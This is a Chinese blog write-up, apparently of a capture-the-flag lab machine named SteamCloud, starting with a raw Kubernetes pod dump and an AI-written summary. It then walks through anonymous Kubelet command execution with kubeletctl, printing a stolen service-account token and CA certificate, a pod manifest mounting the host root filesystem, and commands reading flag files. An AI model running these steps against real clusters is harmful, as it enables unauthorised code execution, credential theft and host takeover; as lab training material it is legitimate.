robeTime":null,"lastTransitionTime":"2025-09-13T01:29:38Z"}],"hostIP":"10.10.11.133","podIP":"10.10.11.133","podIPs":[{"ip":"10.10.11.133"}],"startTime":"2025-09-13T01:29:38Z","containerStatuses":[{"name":"kube-proxy","state":{"running":{"startedAt":"2025-09-13T01:29:40Z"}},"lastState":{},"ready":true,"restartCount":0,"image":"k8s.gcr.io/kube-proxy:v1.22.3","imageID":"docker-pullable://k8s.gcr.io/kube-proxy@sha256:8d0561b2e5d0ccb9c49a25e7b415bef12637a07a872703dc252c2de3b458fc4f","containerID":"docker://c26587e5d7bcfde7fd0cd2e7c23ac9c4e8ab85b4988c828d30fc55f17483d039","started":true}],"qosClass":"BestEffort"}},{"metadata":{"name":"coredns-78fcd69978-phvsw","generateName":"coredns-78fcd69978-","namespace":"kube-system","uid":"453edf6f-fc2d-47b6-8e08-6c996d14b790","resourceVersion":"453","creationTimestamp":"2025-09-13T01:29:39Z","labels":{"k8s-app":"kube-dns","pod-template-hash":"78fcd69978"},"annotations":{"kubernetes.io/config.seen":"2025-09-12T21:29:39.526605211-04:00","kubernetes.io/config.source":"api"},"ownerReferences":[{"apiVersion":"apps/v1","kind":"ReplicaSet","name":"coredns-78fcd69978","uid":"e2b4ab2d-1029-4cfb-a08d-dff395db0ac4","controller":true,"blockOwnerDeletion":true}],"managedFields":[{"manager":"kube-controller-manager","operation":"Update","apiVersion":"v1","time":"2025-09-13T01:29:39Z","fieldsType":"FieldsV1","fieldsV1":{"f:metadata":{"f:generateName":{},"f:labels":{".":{},"f:k8s-app":{},"f:pod-template-hash":{}},"f:ownerReferences":{".":{},"k:{\"uid\":\"e2b4ab2d-1029-4cfb-a08d-dff395db0ac4\"}":{}}},"f:spec":{"f:containers":{"k:{\"name\":\"coredns\"}":{".":{},"f:args":{},"f:image":{},"f:imagePullPolicy":{},"f:livenessProbe":{".":{},"f:failureThreshold":{},"f:httpGet":{".":{},"f:path":{},"f:port":{},"f:scheme":{}},"f:initialDelaySeconds":{},"f:periodSeconds":{},"f:successThreshold":{},"f:timeoutSeconds":{}},"f:name":{},"f:ports":{".":{},"k:{\"containerPort\":53,\"protocol\":\"TCP\"}":{".":{},"f:containerPort":{},"f:name":{},"f:protocol":{}},"k:{\"containerPort\":53,\"protocol\":\"UDP\"}":{".":{},"f:containerPort":{},"f:name":{},"f:protocol":{}},"k:{\"containerPort\":9153,\"protocol\":\"TCP\"}":{".":{},"f:containerPort":{},"f:name":{},"f:protocol":{}}},"f:readinessProbe":{".":{},"f:failureThreshold":{},"f:httpGet":{".":{},"f:path":{},"f:port":{},"f:scheme":{}},"f:periodSeconds":{},"f:successThreshold":{},"f:timeoutSeconds":{}},"f:resources":{".":{},"f:limits":{".":{},"f:memory":{}},"f:requests":{".":{},"f:cpu":{},"f:memory":{}}},"f:securityContext":{".":{},"f:allowPrivilegeEscalation":{},"f:capabilities":{".":{},"f:add":{},"f:drop":{}},"f:readOnlyRootFilesystem":{}},"f:terminationMessagePath":{},"f:terminationMessagePolicy":{},"f:volumeMounts":{".":{},"k:{\"mountPath\":\"/etc/coredns\"}":{".":{},"f:mountPath":{},"f:name":{},"f:readOnly":{}}}}},"f:dnsPolicy":{},"f:enableServiceLinks":{},"f:nodeSelector":{},"f:priorityClassName":{},"f:restartPolicy":{},"f:schedulerName":{},"f:securityContext":{},"f:serviceAccount":{},"f:serviceAccountName":{},"f:terminationGracePeriodSeconds":{},"f:tolerations":{},"f:volumes":{".":{},"k:{\"name\":\"config-volume\"}":{".":{},"f:configMap":{".":{},"f:defaultMode":{},"f:items":{},"f:name":{}},"f:name":{}}}}}}]},"spec":{"volumes":[{"name":"config-volume","configMap":{"name":"coredns","items":[{"key":"Corefile","path":"Corefile"}],"defaultMode":420}},{"name":"kube-api-access-s6pc2","projected":{"sources":[{"serviceAccountToken":{"expirationSeconds":3607,"path":"token"}},{"configMap":{"name":"kube-root-ca.crt","items":[{"key":"ca.crt","path":"ca.crt"}]}},{"downwardAPI":{"items":[{"path":"namespace","fieldRef":{"apiVersion":"v1","fieldPath":"metadata.namespace"}}]}}],"defaultMode":420}}],"containers":[{"name":"coredns","image":"k8s.gcr.io/coredns/coredns:v1.8.4","args":["-conf","/etc/coredns/Corefile"],"ports":[{"name":"dns","containerPort":53,"protocol":"UDP"},{"name":"dns-tcp","containerPort":53,"protocol":"TCP"},{"name":"metrics","containerPort":9153,"protocol":"TCP"}],"resources":{"limits":{"memory":"170Mi"},"requests":{"cpu":"100m","memory":"70Mi"}},"volumeMounts":[{"name":"config-volume","readOnly":true,"mountPath":"/etc/coredns"},{"name":"kube-api-access-s6pc2","readOnly":true,"mountPath":"/var/run/secrets/kubernetes.io/serviceaccount"}],"livenessProbe":{"httpGet":{"path":"/health","port":8080,"scheme":"HTTP"},"initialDelaySeconds":60,"timeoutSeconds":5,"periodSeconds":10,"successThreshold":1,"failureThreshold":5},"readinessProbe":{"httpGet":{"path":"/ready","port":8181,"scheme":"HTTP"},"timeoutSeconds":1,"periodSeconds":10,"successThreshold":1,"failureThreshold":3},"terminationMessagePath":"/dev/termination-log","terminationMessagePolicy":"File","imagePullPolicy":"IfNotPresent","securityContext":{"capabilities":{"add":["NET_BIND_SERVICE"],"drop":["all"]},"readOnlyRootFilesystem":true,"allowPrivilegeEscalation":false}}],"restartPolicy":"Always","terminationGracePeriodSeconds":30,"dnsPolicy":"Default","nodeSelector":{"kubernetes.io/os":"linux"},"serviceAccountName":"coredns","serviceAccount":"coredns","nodeName":"steamcloud","securityContext":{},"schedulerName":"default-scheduler","tolerations":[{"key":"CriticalAddonsOnly","operator":"Exists"},{"key":"node-role.kubernetes.io/master","effect":"NoSchedule"},{"key":"node-role.kubernetes.io/control-plane","effect":"NoSchedule"},{"key":"node.kubernetes.io/not-ready","operator":"Exists","effect":"NoExecute","tolerationSeconds":300},{"key":"node.kubernetes.io/unreachable","operator":"Exists","effect":"NoExecute","tolerationSeconds":300}],"priorityClassName":"system-cluster-critical","priority":2000000000,"enableServiceLinks":true,"preemptionPolicy":"PreemptLowerPriority"},"status":{"phase":"Running","conditions":[{"type":"Initialized","status":"True","lastProbeTime":null,"lastTransitionTime":"2025-09-13T01:29:39Z"},{"type":"Ready","status":"True","lastProbeTime":null,"lastTransitionTime":"2025-09-13T01:29:41Z"},{"type":"ContainersReady","status":"True","lastProbeTime":null,"lastTransitionTime":"2025-09-13T01:29:41Z"},{"type":"PodScheduled","status":"True","lastProbeTime":null,"lastTransitionTime":"2025-09-13T01:29:39Z"}],"hostIP":"10.10.11.133","podIP":"172.17.0.2","podIPs":[{"ip":"172.17.0.2"}],"startTime":"2025-09-13T01:29:39Z","containerStatuses":[{"name":"coredns","state":{"running":{"startedAt":"2025-09-13T01:29:40Z"}},"lastState":{},"ready":true,"restartCount":0,"image":"k8s.gcr.io/coredns/coredns:v1.8.4","imageID":"docker-pullable://k8s.gcr.io/coredns/coredns@sha256:6e5a02c21641597998b4be7cb5eb1e7b02c0d8d23cce4dd09f4682d463798890","containerID":"docker://53edcad7192f2c4edc444b4a07a294e709eb13b941bde5f0f046feaafc31f540","started":true}],"qosClass":"Burstable"}},{"metadata":{"name":"nginx","namespace":"default","uid":"2e98a278-605a-4a8e-bbbd-f0e89d7613ef","resourceVersion":"494","creationTimestamp":"2025-09-13T01:30:02Z","annotations":{"kubectl.kubernetes.io/last-applied-configuration":"{\"apiVersion\":\"v1\",\"kind\":\"Pod\",\"metadata\":{\"annotations\":{},\"name\":\"nginx\",\"namespace\":\"default\"},\"spec\":{\"containers\":[{\"image\":\"nginx:1.14.2\",\"imagePullPolicy\":\"Never\",\"name\":\"nginx\",\"volumeMounts\":[{\"mountPath\":\"/root\",\"name\":\"flag\"}]}],\"volumes\":[{\"hostPath\":{\"path\":\"/opt/flag\"},\"name\":\"flag\"}]}}\n","kubernetes.io/config.seen":"2025-09-12T21:30:02.317025326-04:00","kubernetes.io/config.source":"api"},"managedFields":[{"manager":"kubectl-client-side-apply","operation":"Update","apiVersion":"v1","time":"2025-09-13T01:30:02Z","fieldsType":"FieldsV1","fieldsV1":{"f:metadata":{"f:annotations":{".":{},"f:kubectl.kubernetes.io/last-applied-configuration":{}}},"f:spec":{"f:containers":{"k:{\"name\":\"nginx\"}":{".":{},"f:image":{},"f:imagePullPolicy":{},"f:name":{},"f:resources":{},"f:terminationMessagePath":{},"f:terminationMessagePolicy":{},"f:volumeMounts":{".":{},"k:{\"mountPath\":\"/root\"}":{".":{},"f:mountPath":{},"f:name":{}}}}},"f:dnsPolicy":{},"f:enableServiceLinks":{},"f:restartPolicy":{},"f:schedulerName":{},"f:securityContext":{},"f:terminationGracePeriodSeconds":{},"f:volumes":{".":{},"k:{\"name\":\"flag\"}":{".":{},"f:hostPath":{".":{},"f:path":{},"f:type":{}},"f:name":{}}}}}}]},"spec":{"volumes":[{"name":"flag","hostPath":{"path":"/opt/flag","type":""}},{"name":"kube-api-access-l7bhb","projected":{"sources":[{"serviceAccountToken":{"expirationSeconds":3607,"path":"token"}},{"configMap":{"name":"kube-root-ca.crt","items":[{"key":"ca.crt","path":"ca.crt"}]}},{"downwardAPI":{"items":[{"path":"namespace","fieldRef":{"apiVersion":"v1","fieldPath":"metadata.namespace"}}]}}],"defaultMode":420}}],"containers":[{"name":"nginx","image":"nginx:1.14.2","resources":{},"volumeMounts":[{"name":"flag","mountPath":"/root"},{"name":"kube-api-access-l7bhb","readOnly":true,"mountPath":"/var/run/secrets/kubernetes.io/serviceaccount"}],"terminationMessagePath":"/dev/termination-log","terminationMessagePolicy":"File","imagePullPolicy":"Never"}],"restartPolicy":"Always","terminationGracePeriodSeconds":30,"dnsPolicy":"ClusterFirst","serviceAccountName":"default","serviceAccount":"default","nodeName":"steamcloud","securityContext":{},"schedulerName":"default-scheduler","tolerations":[{"key":"node.kubernetes.io/not-ready","operator":"Exists","effect":"NoExecute","tolerationSeconds":300},{"key":"node.kubernetes.io/unreachable","operator":"Exists","effect":"NoExecute","tolerationSeconds":300}],"priority":0,"enableServiceLinks":true,"preemptionPolicy":"PreemptLowerPriority"},"status":{"phase":"Running","conditions":[{"type":"Initialized","status":"True","lastProbeTime":null,"lastTransitionTime":"2025-09-13T01:30:02Z"},{"type":"Ready","status":"True","lastProbeTime":null,"lastTransitionTime":"2025-09-13T01:30:04Z"},{"type":"ContainersReady","status":"True","lastProbeTime":null,"lastTransitionTime":"2025-09-13T01:30:04Z"},{"type":"PodScheduled","status":"True","lastProbeTime":null,"lastTransitionTime":"2025-09-13T01:30:02Z"}],"hostIP":"10.10.11.133","podIP":"172.17.0.3","podIPs":[{"ip":"172.17.0.3"}],"startTime":"2025-09-13T01:30:02Z","containerStatuses":[{"name":"nginx","state":{"running":{"startedAt":"2025-09-13T01:30:03Z"}},"lastState":{},"ready":true,"restartCount":0,"image":"nginx:1.14.2","imageID":"docker-pullable://nginx@sha256:f7988fb6c02e0ce69257d9bd9cf37ae20a60f1df7563c3a2a6abe24160306b8d","containerID":"docker://7d2a2e576213a622800574845ccf5547c39e419f5dd54e9993373605bcfaf704","started":true}],"qosClass":"BestEffort"}}]}

很乱是吧,但现在是5202年,博主也懒得看,直接拖给AI整理信息
整理信息如下

集群概览

集群类型: Minikube 单节点集群
节点名称: steamcloud
节点IP: 10.10.11.133
Kubernetes版本: v1.22.3

Pod 详细信息

系统核心组件 (kube-system namespace)

1. kube-controller-manager-steamcloud
状态: Running
镜像: k8s.gcr.io/kube-controller-manager:v1.22.3
重启次数: 23次
资源请求: CPU 200m
主要功能: 集群控制器管理器,负责节点控制、副本控制等
关键配置:
集群CIDR: 10.244.0.0/16
服务CIDR: 10.96.0.0/12
启用所有控制器包括 bootstrapsigner 和 tokencleaner

2. kube-scheduler-steamcloud
状态: Running
镜像: k8s.gcr.io/kube-scheduler:v1.22.3
重启次数: 22次
资源请求: CPU 100m
主要功能: Pod 调度器,负责将 Pod 分配到合适的节点

3. etcd-steamcloud
状态: Running
镜像: k8s.gcr.io/etcd:3.5.0-0
重启次数: 0次
资源请求: CPU 100m, Memory 100Mi
主要功能: 集群数据存储
监听端口: 
客户端: 2379 (HTTPS)
对等节点: 2380 (HTTPS)
指标: 2381 (HTTP)

4. kube-apiserver-steamcloud
状态: Running
镜像: k8s.gcr.io/kube-apiserver:v1.22.3
重启次数: 0次
资源请求: CPU 250m
主要功能: Kubernetes API 服务器
监听端口: 8443 (HTTPS)
广告地址: 10.10.11.133:8443

网络和存储组件

5. kube-proxy-gb8zn
状态: Running
镜像: k8s.gcr.io/kube-proxy:v1.22.3
重启次数: 0次
主要功能: 网络代理,实现 Service 的负载均衡
部署方式: DaemonSet

6. coredns-78fcd69978-phvsw
状态: Running
镜像: k8s.gcr.io/coredns/coredns:v1.8.4
重启次数: 0次
资源配置: 
请求: CPU 100m, Memory 70Mi
限制: Memory 170Mi
主要功能: 集群 DNS 服务
Pod IP: 172.17.0.2

7. storage-provisioner
状态: Running
镜像: gcr.io/k8s-minikube/storage-provisioner:v5
重启次数: 1次
主要功能: Minikube 存储供应器

用户应用 (default namespace)

8. nginx
状态: Running
镜像: nginx:1.14.2
重启次数: 0次
Pod IP: 172.17.0.3
特殊配置: 
挂载主机路径 /opt/flag 到容器 /root
镜像拉取策略: Never (使用本地镜像)

网络配置

Pod 网络: 172.17.0.0/16 (Docker 桥接网络)
集群 CIDR: 10.244.0.0/16
服务 CIDR: 10.96.0.0/12
主机网络: 大部分系统组件使用 hostNetwork: true

安全配置

安全上下文: 所有系统组件都配置了 RuntimeDefault seccomp 配置
特权容器: kube-proxy 运行在特权模式
证书管理: 使用 /var/lib/minikube/certs 目录存储证书

存储挂载

系统组件主要挂载以下目录:
证书目录: /var/lib/minikube/certs
CA 证书: /etc/ssl/certs, /etc/ca-certificates
配置文件: /etc/kubernetes/
etcd 数据: /var/lib/minikube/etcd

这个集群是一个典型的 Minikube 开发环境,所有组件都运行在单个节点上,适合开发和测试使用。nginx Pod 的特殊挂载配置表明可能用于某种特定的测试或演示场景。

我们能够提取 k8s 集群中的所有 pod。虽然这个服务有几个未记录的 API,但我们可以使用 kubeletctl 与之交互,并找到一种方法进入一个 pod。让我们下载并安装 kubeletctl 二进制文件。
https://github.com/cyberark/kubeletctl/releases下载工具
安装

chmod +x kubeletctl_linux_arm64
mv kubeletctl_linux_arm64 /usr/local/bin/kubeletctl

执行扫描pod

kubeletctl --server 10.10.11.133 pods
POD NAMESPACE CONTAINERS 
1 kube-apiserver-steamcloud kube-system kube-apiserver
2 storage-provisioner kube-system storage-provisioner
3 kube-proxy-gb8zn kube-system kube-proxy
4 coredns-78fcd69978-phvsw kube-system coredns
5 nginx default nginx
6 kube-controller-manager-steamcloud kube-system kube-controller-manager
7 kube-scheduler-steamcloud kube-system kube-scheduler
8 etcd-steamcloud kube-system etcd

成功返回了所有 pod 的列表。
我们已经知道 Nginx 仅存在于默认命名空间中,不是一个与 Kubernetes 相关的 pod。由于 Kubelet 允许匿名访问,我们可以使用命令 /run/exec/cri,但 curl 没用,因为它只允许 WebSocket 连接。我们可以使用 Kubeletctl 中的 scan rce 命令来确定我们是否可以在任何 pod 上运行命令。

kubeletctl --server 10.10.11.133 scan rce
Node with pods vulnerable to RCE

    NODE IP      PODS                               NAMESPACE   CONTAINERS              RCE
                                                                                        RUN

 1  10.10.11.133 coredns-78fcd69978-phvsw           kube-system coredns                 -

 2               nginx                              default     nginx                   +

 3               kube-controller-manager-steamcloud kube-system kube-controller-manager -

 4               kube-scheduler-steamcloud          kube-system kube-scheduler          -

 5               etcd-steamcloud                    kube-system etcd                    -

 6               kube-apiserver-steamcloud          kube-system kube-apiserver          -

 7               storage-provisioner                kube-system storage-provisioner     -

 8               kube-proxy-gb8zn                   kube-system kube-proxy              +

nginx pod 存在RCE漏洞,可以执行命令
kube-proxy-gb8zn pod 也存在RCE漏洞
既然结果表明可以在 Nginx pod 上执行命令。让我们看看我们是否可以在 Nginx 中运行 id。

┌──(root㉿kali)-[~]
└─# kubeletctl --server 10.10.11.133 exec "id" -p nginx -c nginx
uid=0(root) gid=0(root) groups=0(root)

命令成功执行,但似乎在这个 pod 上没有用户标志。
但是我们确认了,存在 Kubelet API 未授权访问漏洞

现在我们已经成功在 Nginx pod 中执行了一个命令,让我们看看是否可以访问令牌和证书,以便我们可以创建一个具有更高权限的服务帐户。接下来我们提权。

kubeletctl --server 10.10.11.133 exec "cat /var/run/secrets/kubernetes.io/serviceaccount/token" -p nginx -c nginx

得到密钥

eyJhbGciOiJSUzI1NiIsImtpZCI6Imx2V1ZEMWpiZ2ZRLXREWFRKc05fTVJIa3RXazdMU1FuemY1MFFfMUhQZTQifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjLmNsdXN0ZXIubG9jYWwiXSwiZXhwIjoxNzg5MjY1ODkzLCJpYXQiOjE3NTc3Mjk4OTMsImlzcyI6Imh0dHBzOi8va3ViZXJuZXRlcy5kZWZhdWx0LnN2Yy5jbHVzdGVyLmxvY2FsIiwia3ViZXJuZXRlcy5pbyI6eyJuYW1lc3BhY2UiOiJkZWZhdWx0IiwicG9kIjp7Im5hbWUiOiJuZ2lueCIsInVpZCI6IjJlOThhMjc4LTYwNWEtNGE4ZS1iYmJkLWYwZTg5ZDc2MTNlZiJ9LCJzZXJ2aWNlYWNjb3VudCI6eyJuYW1lIjoiZGVmYXVsdCIsInVpZCI6IjcxODIyZjc5LTRmZmItNDNiNC04ZTY1LTVmZWU0NGEwOTg5OCJ9LCJ3YXJuYWZ0ZXIiOjE3NTc3MzM1MDB9LCJuYmYiOjE3NTc3Mjk4OTMsInN1YiI6InN5c3RlbTpzZXJ2aWNlYWNjb3VudDpkZWZhdWx0OmRlZmF1bHQifQ.VfGeHD3WvImsUL4XfwKsRnv5aBvlMrfvK9cZojYWIAn5H_kw8E_ZWTkQMuZrI_BIPs4-louyrGcegvwm4l3a9y0C4HtfDPGoEWR1uVEurjcp1nerYI-tNoMrLSqNKffHs8F-y9TaLfx2Qd6OPAUHLkxE7WYpcDGkSw1GLfa9sao-bEj0uEZpjuMESAKT1GPLj6AIU7uBxtOgYWNJrTWIHpmuYS5I-msRm6-DlPSvgYM0cphvWAsY_6kSJcJkWE9NpYlkJYyRPMmN7Q6sc5Paps517-hobkchufXunOZi1Q1zmymqaemLR4e_5otiPht5fULEKZQQmP4vD65CoTuUYg
kubeletctl --server 10.10.11.133 exec "cat /var/run/secrets/kubernetes.io/serviceaccount/ca.crt" -p nginx -c nginx

得到证书

-----BEGIN CERTIFICATE-----
MIIDBjCCAe6gAwIBAgIBATANBgkqhkiG9w0BAQsFADAVMRMwEQYDVQQDEwptaW5p
a3ViZUNBMB4XDTIxMTEyOTEyMTY1NVoXDTMxMTEyODEyMTY1NVowFTETMBEGA1UE
AxMKbWluaWt1YmVDQTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAOoa
YRSqoSUfHaMBK44xXLLuFXNELhJrC/9O0R2Gpt8DuBNIW5ve+mgNxbOLTofhgQ0M
HLPTTxnfZ5VaavDH2GHiFrtfUWD/g7HA8aXn7cOCNxdf1k7M0X0QjPRB3Ug2cID7
deqATtnjZaXTk0VUyUp5Tq3vmwhVkPXDtROc7QaTR/AUeR1oxO9+mPo3ry6S2xqG
VeeRhpK6Ma3FpJB3oN0Kz5e6areAOpBP5cVFd68/Np3aecCLrxf2Qdz/d9Bpisll
hnRBjBwFDdzQVeIJRKhSAhczDbKP64bNi2K1ZU95k5YkodSgXyZmmkfgYORyg99o
1pRrbLrfNk6DE5S9VSUCAwEAAaNhMF8wDgYDVR0PAQH/BAQDAgKkMB0GA1UdJQQW
MBQGCCsGAQUFBwMCBggrBgEFBQcDATAPBgNVHRMBAf8EBTADAQH/MB0GA1UdDgQW
BBSpRKCEKbVtRsYEGRwyaVeonBdMCjANBgkqhkiG9w0BAQsFAAOCAQEA0jqg5pUm
lt1jIeLkYT1E6C5xykW0X8mOWzmok17rSMA2GYISqdbRcw72aocvdGJ2Z78X/HyO
DGSCkKaFqJ9+tvt1tRCZZS3hiI+sp4Tru5FttsGy1bV5sa+w/+2mJJzTjBElMJ/+
9mGEdIpuHqZ15HHYeZ83SQWcj0H0lZGpSriHbfxAIlgRvtYBfnciP6Wgcy+YuU/D
xpCJgRAw0IUgK74EdYNZAkrWuSOA0Ua8KiKuhklyZv38Jib3FvAo4JrBXlSjW/R0
JWSyodQkEF60Xh7yd2lRFhtyE8J+h1HeTz4FpDJ7MuvfXfoXxSDQOYNQu09iFiMz
kf2eZIBNMp0TFg==
-----END CERTIFICATE-----

访问令牌和证书已经成功获取。

我们可以使用这些登录到 Kubectl 并检查我们有什么样的权限。将证书保存在名为 ca.crt 的文件中,并将令牌导出为环境变量。
首先将证书保存到ca.crt
接着

export token="eyJhbGciOiJSUzI1NiIsImtpZCI6Imx2V1ZEMWpiZ2ZRLXREWFRKc05fTVJIa3RXazdMU1FuemY1MFFfMUhQZTQifQ.eyJhdWQiOlsiaHR0cHM6Ly9rdWJlcm5ldGVzLmRlZmF1bHQuc3ZjLmNsdXN0ZXIubG9jYWwiXSwiZXhwIjoxNzg5MjY1ODkzLCJpYXQiOjE3NTc3Mjk4OTMsImlzcyI6Imh0dHBzOi8va3ViZXJuZXRlcy5kZWZhdWx0LnN2Yy5jbHVzdGVyLmxvY2FsIiwia3ViZXJuZXRlcy5pbyI6eyJuYW1lc3BhY2UiOiJkZWZhdWx0IiwicG9kIjp7Im5hbWUiOiJuZ2lueCIsInVpZCI6IjJlOThhMjc4LTYwNWEtNGE4ZS1iYmJkLWYwZTg5ZDc2MTNlZiJ9LCJzZXJ2aWNlYWNjb3VudCI6eyJuYW1lIjoiZGVmYXVsdCIsInVpZCI6IjcxODIyZjc5LTRmZmItNDNiNC04ZTY1LTVmZWU0NGEwOTg5OCJ9LCJ3YXJuYWZ0ZXIiOjE3NTc3MzM1MDB9LCJuYmYiOjE3NTc3Mjk4OTMsInN1YiI6InN5c3RlbTpzZXJ2aWNlYWNjb3VudDpkZWZhdWx0OmRlZmF1bHQifQ.VfGeHD3WvImsUL4XfwKsRnv5aBvlMrfvK9cZojYWIAn5H_kw8E_ZWTkQMuZrI_BIPs4-louyrGcegvwm4l3a9y0C4HtfDPGoEWR1uVEurjcp1nerYI-tNoMrLSqNKffHs8F-y9TaLfx2Qd6OPAUHLkxE7WYpcDGkSw1GLfa9sao-bEj0uEZpjuMESAKT1GPLj6AIU7uBxtOgYWNJrTWIHpmuYS5I-msRm6-DlPSvgYM0cphvWAsY_6kSJcJkWE9NpYlkJYyRPMmN7Q6sc5Paps517-hobkchufXunOZi1Q1zmymqaemLR4e_5otiPht5fULEKZQQmP4vD65CoTuUYg"

然后运行以下命令获取 pod 列表。

kubectl --token=$token --certificate-authority=ca.crt --server=https://10.10.11.133:8443 get pods
NAME    READY   STATUS    RESTARTS   AGE
nginx   1/1     Running   0          3h15m

默认服务帐户似乎具有一些基本权限,因此让我们使用 auth can-i 列出所有这些权限。

kubectl --token=$token --certificate-authority=ca.crt --server=https://10.10.11.133:8443 auth can-i --list
Resources                                       Non-Resource URLs                     Resource Names   Verbs
selfsubjectaccessreviews.authorization.k8s.io   []                                    []               [create]
selfsubjectrulesreviews.authorization.k8s.io    []                                    []               [create]
pods                                            []                                    []               [get create list]
                                                [/.well-known/openid-configuration]   []               [get]
                                                [/api/*]                              []               [get]
                                                [/api]                                []               [get]
                                                [/apis/*]                             []               [get]
                                                [/apis]                               []               [get]
                                                [/healthz]                            []               [get]
                                                [/healthz]                            []               [get]
                                                [/livez]                              []               [get]
                                                [/livez]                              []               [get]
                                                [/openapi/*]                          []               [get]
                                                [/openapi]                            []               [get]
                                                [/openid/v1/jwks]                     []               [get]
                                                [/readyz]                             []               [get]
                                                [/readyz]                             []               [get]
                                                [/version/]                           []               [get]
                                                [/version/]                           []               [get]
                                                [/version]                            []               [get]
                                                [/version]                            []               [get]

我们可以在默认命名空间中获取、列出和创建 pod。为了创建一个 pod,我们可以使用 Nginx 镜像。让我们创建一个恶意 pod。将以下 YAML 配置保存在名为 p.yaml 的文件中。

apiVersion: v1
kind: Pod
metadata:
    name: nginxt
    namespace: default
spec:
    containers:
    - name: nginxt
      image: nginx:1.14.2
      volumeMounts:
      - mountPath: /root
        name: mount-root-into-mnt
    volumes:
    - name: mount-root-into-mnt
      hostPath:
        path: /
    automountServiceAccountToken: true
    hostNetwork: true

我们使用相同的 Nginx 镜像,并在容器中挂载主机文件系统,以便我们可以访问它。一旦我们创建了它,我们可以使用 Kubeletctl 在 pod 中运行命令。让我们尝试应用配置并查看我们新生成的 pod 是否正在运行。
创建pod

kubectl --token=$token --certificate-authority=ca.crt --server=https://10.10.11.133:8443 apply -f p.yaml

回显

pod/nginxt created

查看pod状态

kubectl --token=$token --certificate-authority=ca.crt --server=<https://10.10.11.133:8443> get pods

回显

NAME     READY   STATUS    RESTARTS   AGE
nginx    1/1     Running   0          3h22m
nginxt   1/1     Running   0          40s

我们的 pod 状态良好,正在运行。现在我们可以同时获取 user 和 root flags。
先获取user

kubeletctl --server 10.10.11.133 exec "cat /root/home/user/user.txt" -p nginxt -c nginxt

得到

489c152799a8c5137b8c52e14cd15dc7

再获取root flag

kubeletctl --server 10.10.11.133 exec "cat /root/root/root.txt" -p nginxt -c nginxt

得到

ddcc95de0703cde46ef1366ca2ace120

Pasted image 20250913125626.png
Pasted image 20250913125744.png
完结撒花🎉(逃

添加新评论

文章状态:已收录~
STAY VIBRANT

浙ICP备2024114970号-1,浙公网安备33020302001744号

本站总访问量 31093 次

© 2025 BushSEC All rights reserved.
歌曲封面
0:00